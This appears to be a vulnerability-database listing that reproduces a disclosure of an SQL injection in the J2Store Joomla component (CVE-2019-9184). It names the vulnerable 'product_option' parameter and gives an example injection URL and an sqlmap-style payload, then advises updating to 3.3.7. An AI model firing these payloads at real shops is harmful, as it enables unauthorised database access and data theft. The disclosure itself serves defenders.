Joomla J2Store SQL Injection

🗓️ 28 Feb 2019 00:00:00Reported by Andrei ConacheType

packetstorm🔗 packetstormsecurity.com👁 55 Views

J2Store Joomla SQL Injection CVE-2019-918

Reporter	Title	Published	Views	Family All 8
0day.today	Joomla J2Store < 3.3.7 Component - SQL Injection Vulnerability	28 Feb 201900:00	–	zdt
Circl	CVE-2019-9184	28 Feb 201900:00	–	circl
CVE	CVE-2019-9184	26 Feb 201915:00	–	cve
Cvelist	CVE-2019-9184	26 Feb 201915:00	–	cvelist
Exploit DB	Joomla! Component J2Store < 3.3.7 - SQL Injection	28 Feb 201900:00	–	exploitdb
exploitpack	Joomla! Component J2Store 3.3.7 - SQL Injection	28 Feb 201900:00	–	exploitpack
NVD	CVE-2019-9184	26 Feb 201915:29	–	nvd
Prion	Sql injection	26 Feb 201915:29	–	prion

`# Exploit Title: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection  
# Date: 19/02/2019  
# Author: Andrei Conache  
# Twitter: @andrei_conache  
# Contact: andrei.conache[at]protonmail.com  
# Software Link: https://www.j2store.org  
# Version: 3.x-3.3.6  
# Tested on: Linux  
# CVE: CVE-2019-9184  
  
  
1. Description:  
J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries  
on the website.  
  
  
2. Proof of Concept:  
  
- Parameter vulnerable: "product_option[j]" array (where j depends on entries)  
- Example: [URL]/index.php?option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX  
- sqlmap: product_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862%20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20UNION%20SELECT%205348%20FROM%20DUAL%29%20END%29  
  
  
3. Solution:  
Update to 3.3.7  
`

28 Feb 2019 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.1778